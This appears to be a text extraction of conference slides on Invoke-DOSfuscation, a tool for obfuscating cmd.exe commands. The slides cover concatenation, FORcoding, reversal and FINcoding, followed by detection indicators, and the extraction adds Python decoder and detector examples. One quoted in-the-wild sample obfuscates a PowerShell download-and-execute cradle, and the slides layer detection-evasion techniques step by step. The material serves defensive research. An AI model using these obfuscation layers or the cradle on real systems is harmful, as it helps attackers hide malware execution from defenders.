%GKZajcAqFZkRLZw%=NazJjhVlGSrXQvT&&set %QiiPPcnDM%=^he^l^l&&set
%jiIZiKXbkZQMpuQ%=dipAbiiHEplZSHr&&!%CdjPuLtXi%!!%kiqjRiiiH%!!%QiiP
PcnDM%! ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. (
ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL)
Invoke-Obfuscation payload
Payload Obfuscation 1 of 4: Concatenation (ITW 2/3)
![Page 138: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/138.jpg)
• Concatenation examples in the wild (3/3):
138
cmd.exe /C "cm^d^.^e^x^e /V^ ^/C s^et g^c^=^er^s^&^&s^e^t
^tf=^he^ll^&^&set^ f^a^=^pow^&^&^s^et^
dq^=W^i^n^do^ws^!fa^!^!g^c^!!^t^f^!\^v^1^.0\^!^fa!^!^gc!!^tf^!^&^&^
ech^o^ iE^X^(^^"iex(neW-OBjecT
nEt.webCLiEnt).dowNlOaDstrING('https://REDACTED')^"^)^;^ ^|^
!dq! -^no^p^ ^-^w^i^n^ ^1^ ^-"
!dq! == WindowsPowerShell\v1.0\powershell
Payload Obfuscation 1 of 4: Concatenation (ITW 3/3)
![Page 139: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/139.jpg)
139
https://f.fwallpapers.com/images/funny-bear.jpg
Last of ITW…
Unseen Techniques
Up Ahead!
![Page 140: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/140.jpg)
140
https://f.fwallpapers.com/images/funny-bear.jpg
Last of ITW…
Unseen Techniques
Up Ahead!
For the past 9 months I have hunted across:
• Public file repositories
• Private file repositories
• Sandbox execution reports
• Endpoint detections for 10+ million endpoints
![Page 141: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/141.jpg)
141
FOR Score And Seven Obfuscation Techniques Ago…
https://www.whitehouse.gov/sites/whitehouse.gov/files/images/first-family/16_abraham_lincoln%5B1%5D.jpg
Payload Obfuscation 2 of 4: FORcoding
![Page 142: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/142.jpg)
142
Payload Obfuscation 2 of 4: FORcoding
![Page 143: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/143.jpg)
143
• cmd /c netstat /ano
Payload Obfuscation 2 of 4: FORcoding
![Page 144: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/144.jpg)
144
• cmd /v /c netstat /ano
• /V
• /V:ON
• /VERBOSE
• /V:::::::::::
• /V=====
• /V_-/\-_
Payload Obfuscation 2 of 4: FORcoding
![Page 145: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/145.jpg)
145
• cmd /v /c netstat /ano
Payload Obfuscation 2 of 4: FORcoding
![Page 146: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/146.jpg)
146
• cmd /v /c netstat /ano
#ForCompatibilityReasons #RisthenewC
Payload Obfuscation 2 of 4: FORcoding
![Page 148: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/148.jpg)
148
• cmd /v /r netstat /ano
#ForCompatibilityReasons #RisthenewC
Payload Obfuscation 2 of 4: FORcoding
![Page 149: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/149.jpg)
149
• cmd /v /r netstat /ano
https://s3.caradvice.com.au/thumb/1200/630/wp-content/uploads/2014/01/ownerreview-honda-cr-v.jpg
Payload Obfuscation 2 of 4: FORcoding
![Page 150: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/150.jpg)
150
• cmd /v /r netstat /ano
Troll-pportunity ™
Payload Obfuscation 2 of 4: FORcoding
![Page 151: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/151.jpg)
151
• cmd Never Gonna Give You Up/vNever Gonna Let You Down/r netstat /ano
https://postmediavancouversun2.files.wordpress.com/2016/10/giphy.gif
Payload Obfuscation 2 of 4: FORcoding
![Page 152: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/152.jpg)
152
• cmd \c echo %PATH%
/v /r netstat /ano
Payload Obfuscation 2 of 4: FORcoding
![Page 155: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/155.jpg)
155
• cmd /v /r netstat /ano
Payload Obfuscation 2 of 4: FORcoding
![Page 156: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/156.jpg)
156
• cmd /v /r "set unique=nets /ao&&…"
Payload Obfuscation 2 of 4: FORcoding
![Page 157: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/157.jpg)
157
• cmd /v /r "set unique=nets /ao&&FOR %A IN ( ) DO…"
Index: 0 1 2 3 4 5 6 7
Char:  n e t s (space) / a o   (index 4 is the space in "nets /ao")
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 158: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/158.jpg)
158
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 ) DO…"
Payload Obfuscation 2 of 4: FORcoding
n e t s / a o
0 1 2 3 4 5 6 7
n
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 159: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/159.jpg)
159
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 ) DO…"
Payload Obfuscation 2 of 4: FORcoding
n e t s / a o
0 1 2 3 4 5 6 7
n e
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 160: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/160.jpg)
160
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 ) DO…"
Payload Obfuscation 2 of 4: FORcoding
n e t s / a o
0 1 2 3 4 5 6 7
n e t
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 161: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/161.jpg)
161
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 ) DO…"
Payload Obfuscation 2 of 4: FORcoding
n e t s / a o
0 1 2 3 4 5 6 7
n e t s t a t / a n o
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 162: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/162.jpg)
162
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO…"
Payload Obfuscation 2 of 4: FORcoding
n e t s / a o
0 1 2 3 4 5 6 7
n e t s t a t / a n o
Arbitrary
end-of-index
delimiter
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
Page 163-165: Payload Obfuscation 2 of 4: FORcoding
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO set final=!final!!unique:~%A,1!&&IF %A==1337 CALL %final:~-12%"
  The loop body appends the character at each index (%A) to the !final! env var; when %A reaches the delimiter, CALL runs the last 12 characters of %final%.
  The delimiter test can be written several ways (https://ss64.com/nt/if.html):
  • ==1337
  • EQU 1337
  • GEQ 1337
  • GTR 1336
Page 166-167: Payload Obfuscation 2 of 4: FORcoding
• cmd /v /r "set unique=OnBeFtUsS C/AaToE&&FOR %A IN (1 3 5 7 5 13 5 9 11 13 1 15 1337) DO set final=!final!!unique:~%A,1!&&IF %A==1337 CALL %final:~-12%"
  (unique now interleaves decoy characters that no index ever selects)
Invoke-DOSfuscation functions also wrap all the building block techniques into each input command…
Page 168: Payload Obfuscation 2 of 4: FORcoding
• cMd /v /R "sET unIQuE=OnBeFtUsS C/AaToE&&foR %a iN (1 3 5 7 5 13 5 9 11 13 1 15 1337) dO sEt fINal=!finAl!!uniQue:~%a,1!&&iF %a==1337 CalL %fInAl:~-12%"
Building block added: Random case
Page 169: Payload Obfuscation 2 of 4: FORcoding
• cMd/v/R"sET unIQuE=OnBeFtUsS C/AaToE&&foR %a iN (1,3;5,7;5,13;5,9;11,13,1;15,1337)dO sEt fINal=!finAl!!uniQue:~%a,1!&&iF %a==1337 CalL %fInAl:~-12%"
Building block added: Whitespace (-), i.e. whitespace removed
Page 170: Payload Obfuscation 2 of 4: FORcoding
• cMd /v /R "sET unIQuE=OnBeFtUsS C/AaToE && foR %a iN ( 1 3 5 7 5 13 5 9 11 13 1 15 1337 ) dO sEt fINal=!finAl!!uniQue:~ %a, 1!&& iF %a == 1337 CalL %fInAl:~ -12% "
Building block added: Whitespace (+), i.e. whitespace inserted
Page 171: Payload Obfuscation 2 of 4: FORcoding
• ,;cMd;/v;,;/R "sET unIQuE=OnBeFtUsS C/AaToE &&,; foR ;,;%a ,;;iN;,,;( , 1; 3 5 7 5 13 5,,9 11 13 1;;15 1337;,),;,;dO,,;;sEt fINal=!finAl!!uniQue:~ %a, 1!&&;;;iF,, ,%a;;,==,,;1337,;;,CalL;,,;%fInAl:~ -12% "
Building block added: Comma & semicolon
Page 172: Payload Obfuscation 2 of 4: FORcoding
• ,;c^Md;/^v;,;/^R "sE^T ^ unIQ^uE=OnBeFt^UsS C/AaToE &&,; fo^R;,;%^a,;; i^N;,,;( , 1; 3 5 7 5 1^3 5,,9 11 1^3 1;;15 ^ 13^37;,),;,;d^O,,;;s^Et fI^Nal=!finAl!!uni^Que:~ %^a, 1!&&;;i^F,,%^a;,=^=,;13^37,;Ca^lL;,%fIn^Al:~ -^12%"
Building block added: Caret
Page 173: Payload Obfuscation 2 of 4: FORcoding
• ,;c^Md;/^v;,;/^R "((sE^T ^ unIQ^uE=OnBeFt^UsS C/AaToE ))&&,; fo^R;,;%^a,;; i^N;,,;( , 1; 3 5 7 5 1^3 5,,9 11 1^3 1;;15 ^ 13^37;,),;,;d^O,,(;(;s^Et fI^Nal=!finAl!!uni^Que:~ %^a,1!))&&(;i^F,%^a,=^=;13^37,(Ca^lL;%fIn^Al:~ -^12%))"
Building block added: Parentheses
Page 174: Payload Obfuscation 2 of 4: FORcoding
• ,;c^Md;/^v;,;/^R "((sE^T ^ unIQ^uE=OnBeFt^UsS C/AaToE ))&&,; fo^R;,;%^a,;; i^N;,,;( ,+1; 3 5 7 +5 1^3 +5,,9 11 +1^3 +1;;+15 ^+13^37;,),;,;d^O,,(;(;s^Et fI^Nal=!finAl!!uni^Que:~ %^a,1!))&&(;i^F,%^a=^=+13^37,(Ca^lL;%fIn^Al:~ -^12%))"
Building block added: Explicit signing (+ in front of the numeric indexes)
All building blocks Invoke-DOSfuscation wraps around each input command:
• Random case
• Whitespace (-/+)
• Comma & semicolon
• Caret
• Parentheses
• Explicit signing
Page 175: Payload Obfuscation 2 of 4: FORcoding
Troll-pportunity ™
Page 176-177: Payload Obfuscation 3 of 4: Reversal
Reversing is similar to FORcoding, but has simpler indexing with the FOR loop's /L argument.
FORcoding:
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO set final=!final!!unique:~%A,1!&&IF %A==1337 CALL %final:~-12%"
Reverse:
• cmd /v /r "set reverse=ona/ tatsten&&FOR /L %A IN (11 -1 0) DO set final=!final!!reverse:~%A,1!&&IF %A==0 CALL %final:~-12%"
Reverse with decoy characters in every other position (step -2, stop at index 1):
• cmd /v /r "set reverse=OoBnFaU/S CtAaTtIsOtNe!n&&FOR /L %A IN (23 -2 1) DO set final=!final!!reverse:~%A,1!&&IF %A==1 CALL %final:~-12%"
Page 178: Payload Obfuscation 3 of 4: Reversal
• cmd /v /r "set reverse=OoBnFaU/S CtAaTtIsOtNe!n&&FOR /L %A IN (23 -2 1) DO set final=!final!!reverse:~%A,1!&&IF %A==1 CALL %final:~-12%"
  The loop-exit test can again be written several ways (https://ss64.com/nt/if.html):
  • ==1
  • EQU 1
  • LEQ 1
  • LSS 2
Page 179-181: Payload Obfuscation 3 of 4: Reversal
• cmd /v /r "set reverse=OoBnFaU/S CtAaTtIsOtNe!n&&FOR /L %A IN (23 -2 1) DO set final=!final!!reverse:~%A,1!&&IF %A==1 CALL %final:~-12%"
C:\> echo %final%
!final!netstat /ano
The literal "!final!" prefix is there because final is undefined on the first iteration, and at the command line (unlike inside a batch file) a reference to an undefined variable is left as-is rather than expanded to nothing. Any of three substring/replacement forms strips those 7 characters:
C:\> echo %final:~-12%
netstat /ano
C:\> echo %final:~7%
netstat /ano
C:\> echo %final:*final!=%
netstat /ano
So the one-liner above works equally with CALL %final:~-12%, CALL %final:~7% or CALL %final:*final!=%.
Page 182-187: Payload Obfuscation 4 of 4: FINcoding
• cmd /v /r "set command=netstat /ano&&CALL %command%"
Substitute characters in the stored command, then undo each substitution with !var:old=new! before the CALL:
• t → Z:  cmd /v /r "set command=neZsZaZ /ano&&set sub1=!command:Z=t!&&CALL %sub1%"
• a → 7:  cmd /v /r "set command=neZsZ7Z /7no&&set sub1=!command:Z=t!&&set sub2=!sub1:7=a!&&CALL %sub2%"
• n → 
?:  cmd /v /r "set command=?eZsZ7Z /7?o&&set sub1=!command:Z=t!&&set sub2=!sub1:7=a!&&set sub3=!sub2:?=n!&&CALL %sub3%"
Page 188-192: Payload Obfuscation 4 of 4: FINcoding
• cmd /v /r "set command=?eZsZ7Z /7?o&&set sub1=!command:Z=t!&&set sub2=!sub1:7=a!&&set sub3=!sub2:?=n!&&CALL %sub3%"
This same command in Out-FINcodedCommand POC:
• cmd /c "set command=?eZsZ7Z /7?o&&cmd /c set sub1=%command:Z=t%^&^&cmd /c set sub2=%sub1:7=a%^^^&^^^&cmd /c set sub3=%sub2:?=n%^^^^^^^&^^^^^^^&cmd /c %sub3%"
• No /V so %var% (not !var!)
• Multiple cmd.exe invocations
• Layered escaping of && (each nested cmd.exe strips one level of carets: ^& → &, ^^^& → ^&, ^^^^^^^& → ^^^&)
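A small evaluator for the three payload encodings (FORcoding, Reversal, FINcoding) that models the cmd.exe behaviours the slides rely on: /V delayed expansion of !var!, the :~start,len substring and :old=new / :*old=new replacement operators, FOR and FOR /L iteration, undefined variables staying literal at the command line, and CALL re-expanding %var% once the loop has built it. This is an added example in Python, not part of Invoke-DOSfuscation or its test harness; it handles the plain and random-case forms shown on these pages, not the whitespace, comma/semicolon, caret or parenthesis layers, and not the nested-cmd.exe Out-FINcodedCommand form.

```python
"""Evaluate FORcoded, Reversed and FINcoded one-liners (added example, not Invoke-DOSfuscation code)."""
import re

# !var!, !var:~start,len!, !var:old=new!, !var:*old=new!  and the %var% equivalents
DELAYED = re.compile(r'!(\w+)(?::(?:~(-?\d+)(?:,(-?\d+))?|(\*?)([^=!]+)=([^!]*)))?!')
PERCENT = re.compile(r'%(\w+)(?::(?:~(-?\d+)(?:,(-?\d+))?|(\*?)([^=%]+)=([^%]*)))?%')
FOR_RE = re.compile(r'^for\s+(/l\s+)?%(\w)\s+in\s*\(([^)]*)\)\s*do\s+(.*)$', re.I | re.S)
SET_RE = re.compile(r'^set\s+(\w+)=(.*)$', re.I | re.S)
IF_RE = re.compile(r'^if\s+(\S+?)\s*==\s*(\S+)\s+(.*)$', re.I | re.S)
CALL_RE = re.compile(r'^call\s+(.*)$', re.I | re.S)
OUTER = re.compile(r'^cmd(?:\.exe)?(?:\s+/\S+)*\s+"(.*)"\s*$', re.I | re.S)


def substring(value, start, length=None):
    """%var:~start,length%: negative start counts from the end, negative length
    drops that many trailing characters, positions past the end yield ''."""
    n = len(value)
    i = start if start >= 0 else max(n + start, 0)
    if length is None:
        return value[i:]
    j = i + length if length >= 0 else n + length
    return value[i:j] if j > i else ""


def replace(value, old, new, prefix=False):
    """%var:old=new% replaces every match (case-insensitive, like cmd.exe);
    %var:*old=new% replaces everything up to and including the first match."""
    low, lo = value.lower(), old.lower()
    if prefix:
        k = low.find(lo)
        return value if k < 0 else new + value[k + len(old):]
    out, i, k = [], 0, low.find(lo)
    while k >= 0:
        out.append(value[i:k] + new)
        i = k + len(old)
        k = low.find(lo, i)
    return "".join(out) + value[i:]


def expand(text, env, pattern):
    """Resolve variable references. An undefined variable is left literally in
    place, as cmd.exe does at the command line (a batch file would expand it to
    nothing); this is where the leading "!final!" in the slides comes from."""
    def one(m):
        name, start, length, star, old, new = m.groups()
        value = env.get(name.lower())
        if value is None:
            return m.group(0)
        if start is not None:
            return substring(value, int(start), None if length is None else int(length))
        if old is not None:
            return replace(value, old, new, prefix=bool(star))
        return value
    return pattern.sub(one, text)


def statement(stmt, env, executed):
    """One set / IF / CALL statement. !var! is expanded first (/V); CALL
    re-expands %var% at run time, so the loop-built variables are visible."""
    stmt = expand(stmt, env, DELAYED)
    m = SET_RE.match(stmt)
    if m:
        env[m.group(1).lower()] = m.group(2)
        return
    m = IF_RE.match(stmt)
    if m:
        if m.group(1) == m.group(2):
            statement(m.group(3), env, executed)
        return
    m = CALL_RE.match(stmt)
    if m:
        executed.append(expand(m.group(1), env, PERCENT))


def run(cmd, env, executed):
    """Execute an &&-chain. A FOR body is everything after DO, so the IF inside
    it runs on every iteration with %A replaced by the current item."""
    cmd = cmd.strip()
    if not cmd:
        return
    m = FOR_RE.match(cmd)
    if m:
        is_l, var, items, body = m.groups()
        values = [v for v in re.split(r'[\s,;=]+', items) if v]
        if is_l:                                   # FOR /L (start step stop), inclusive
            start, step, stop = map(int, values)
            if step == 0:
                return
            values = [str(i) for i in range(start, stop + (1 if step > 0 else -1), step)]
        for v in values:
            run(body.replace("%" + var, v), env, executed)
        return
    head, sep, rest = cmd.partition("&&")
    statement(head.strip(), env, executed)
    if sep:
        run(rest, env, executed)


def decode(cmdline):
    """Return the commands a cmd /v /r "..." one-liner would hand to CALL."""
    m = OUTER.match(cmdline.strip())
    env, executed = {}, []
    run(m.group(1) if m else cmdline, env, executed)
    return executed


# The four one-liners from the slides, used as sample input
SAMPLES = {
    "FORcoding": 'cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO set final=!final!!unique:~%A,1!&&IF %A==1337 CALL %final:~-12%"',
    "FORcoding+decoys": 'cmd /v /r "set unique=OnBeFtUsS C/AaToE&&FOR %A IN (1 3 5 7 5 13 5 9 11 13 1 15 1337) DO set final=!final!!unique:~%A,1!&&IF %A==1337 CALL %final:~-12%"',
    "Reversal": 'cmd /v /r "set reverse=OoBnFaU/S CtAaTtIsOtNe!n&&FOR /L %A IN (23 -2 1) DO set final=!final!!reverse:~%A,1!&&IF %A==1 CALL %final:*final!=%"',
    "FINcoding": 'cmd /v /r "set command=?eZsZ7Z /7?o&&set sub1=!command:Z=t!&&set sub2=!sub1:7=a!&&set sub3=!sub2:?=n!&&CALL %sub3%"',
}

if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(name, "->", decode(sample))
```

Because undefined references stay literal, `final` ends up as `!final!netstat /ano` exactly as the slides show, and all three of `%final:~-12%`, `%final:~7%` and `%final:*final!=%` recover the payload from it.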
Page 193: OUTLINE
State of the Union Obfuscation
Obfuscation in the Wild: 3 Case Studies
Whose Binary is it Anyway: Obfuscating Binary Names
Deep Dive: Character Insertion Obfuscation
Deep(er) Dive: Advanced Payload Obfuscation
C:\> Invoke-DOSfuscation Demo
Detecting DOSfuscation
Page 194: DISCLAIMER
• Please do not use this tool for evil.
• FIN7, FIN8 & APT32: Please do not use this tool at all ☺
https://github.com/danielbohannon/Invoke-DOSfuscation
Page 195: OUTLINE
State of the Union Obfuscation
Obfuscation in the Wild: 3 Case Studies
Whose Binary is it Anyway: Obfuscating Binary Names
Deep Dive: Character Insertion Obfuscation
Deep(er) Dive: Advanced Payload Obfuscation
Invoke-DOSfuscation Demo
C:\> Detecting DOSfuscation
Page 196: Detecting DOSfuscation (more details in white paper)
• Long argument length
• High frequency of obfuscation characters: , ; ^ " ( )
• Rare obfuscation of internal commands:
  • C^AL^^L or ;SET,
• Unusual execution flags:
  • /V or /R (or /^R)
• Variable substring and replacement syntax:
  • %var:~7,1% or !var:~%a,1! or !var:*var=!
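The indicators on the slide above turned into a scorer over constructed command lines. This is an added example in Python, not the Invoke-DOSfuscationTestHarness code; the thresholds (150 characters, 10% obfuscation characters, two indicators to flag) and the keyword list are assumptions chosen for this example, and the sample inputs are two constructed benign lines plus two one-liners from the FORcoding slides.

```python
"""Score cmd.exe command lines with the DOSfuscation indicators above (added example, not the test-harness code)."""
import re

OBFUSCATION_CHARS = set(',;^"()')
KEYWORDS = ("set", "call", "for", "if", "echo")       # internal commands to watch (assumption)
# Unusual execution flags: /V or /R, also with a caret inside the flag (/^R)
FLAGS = re.compile(r'(?i)/\^?[vr](?![a-z0-9])')
# Substring / replacement syntax: %var:~7,1%  !var:~%a,1!  !var:*var=!  %var:old=new%
# (carets and whitespace inside the expression are tolerated, as in %fIn^Al:~ -^12%)
VARSYNTAX = re.compile(r'[%!][\w^]+:[\s^]*(?:~|\*|[^%!=]+=)')
# Thresholds are assumptions chosen for this example, not values from the talk
MIN_LENGTH = 150
MIN_OBF_CHAR_RATIO = 0.10
MIN_SCORE = 2


def obfuscated_keywords(cmd):
    """Internal commands spelled with carets inside them (C^AL^^L) or touching
    a comma/semicolon (;SET,); both are rare in legitimate command lines."""
    hits = []
    for kw in KEYWORDS:
        letters = r"\^*".join(re.escape(c) for c in kw)            # e.g. s\^*e\^*t
        for m in re.finditer(r"(?i)(?<![a-z0-9])" + letters + r"(?![a-z0-9])", cmd):
            before = cmd[m.start() - 1] if m.start() > 0 else " "
            after = cmd[m.end()] if m.end() < len(cmd) else " "
            if "^" in m.group(0) or before in (",", ";") or after in (",", ";"):
                hits.append(m.group(0))
    return hits


def analyze(cmd):
    """Return the raw indicators plus a score of one point per indicator."""
    obf = sum(c in OBFUSCATION_CHARS for c in cmd)
    ind = {
        "length": len(cmd),
        "obf_char_ratio": obf / max(len(cmd), 1),
        "obfuscated_keywords": obfuscated_keywords(cmd),
        "unusual_flags": FLAGS.findall(cmd),
        "var_manipulation": VARSYNTAX.findall(cmd),
    }
    ind["score"] = sum([
        ind["length"] > MIN_LENGTH,
        ind["obf_char_ratio"] > MIN_OBF_CHAR_RATIO,
        bool(ind["obfuscated_keywords"]),
        bool(ind["unusual_flags"]),
        bool(ind["var_manipulation"]),
    ])
    ind["suspicious"] = ind["score"] >= MIN_SCORE
    return ind


# Constructed samples: two benign command lines and two command lines from the slides above
BENIGN = [r"cmd /c dir C:\Users", 'cmd.exe /c "echo %PATH% && set FOO=bar"']
FORCODED = ('cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO '
            'set final=!final!!unique:~%A,1!&&IF %A==1337 CALL %final:~-12%"')
CARETED = (',;c^Md;/^v;,;/^R "sE^T ^ unIQ^uE=OnBeFt^UsS C/AaToE &&,; fo^R;,;%^a,;; '
           'i^N;,,;( , 1; 3 5 7 5 1^3 5,,9 11 1^3 1;;15 ^ 13^37;,),;,;d^O,,;;s^Et '
           'fI^Nal=!finAl!!uni^Que:~ %^a, 1!&&;;i^F,,%^a;,=^=,;13^37,;Ca^lL;,%fIn^Al:~ -^12%"')

if __name__ == "__main__":
    for cmd in BENIGN + [FORCODED, CARETED]:
        r = analyze(cmd)
        print(r["score"], "suspicious" if r["suspicious"] else "clean", cmd[:60])
```

The unlayered FORcoding one-liner is short and uses almost no obfuscation characters, so only the /V /R flags and the !var:~ syntax fire; that is why the slide lists those two indicators separately from length and character frequency.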
Page 197: Detecting DOSfuscation (more details in white paper)
• Suspicious sub-command and stdin child process artifacts
  • FOR loop executes sub-command via separate cmd.exe invocation
  • Cmd.exe pipeline to add'l binary (e.g. findstr.exe) spawns pre-pipe arguments via separate cmd.exe invocation with these arguments: cmd.exe /S /D /c" set"
    Tell-tale details of that child command line called out on the slide: double whitespace, no space between /c and ", and whitespace after the first "
Page 200: Detecting DOSfuscation – Test Harness FTW!
• Invoke-DOSfuscationTestHarness.psm1: THE module I used to develop detection ideas
  • Invoke-DosTestHarness
  • Get-DosDetectionMatch
• Released 4000 sample obfuscated commands as .txt & .evtx files for static and dynamic purposes
Page 201: Key Takeaways
• Attackers are using more creative command argument obfuscation techniques
• Cmd.exe supports significant obfuscation and encoding capabilities not yet seen in the wild
• Defenders must match levels of attacker creativity with detection creativity
Page 202: Credit Where Credit Is Due
• FireEye Advanced Practices Team
  • Nick Carr, Matthew Dunwoody, Ben Withnell
• My wife: Paige
• 9 months research & hunting (500+ hours)
• 320 hours Invoke-DOSfuscation tool development
• 100 hours slide/presentation development & 100 hours white paper
Page 203: Thanks! Questions?
• Daniel Bohannon
• Twitter :: @danielhbohannon
• Blog :: http://danielbohannon.com
• Code: https://github.com/danielbohannon/Invoke-DOSfuscation
• White paper: https://www.fireeye.com/blog/threat-research/2018/03/dosfuscation-exploring-obfuscation-and-detection-techniques.html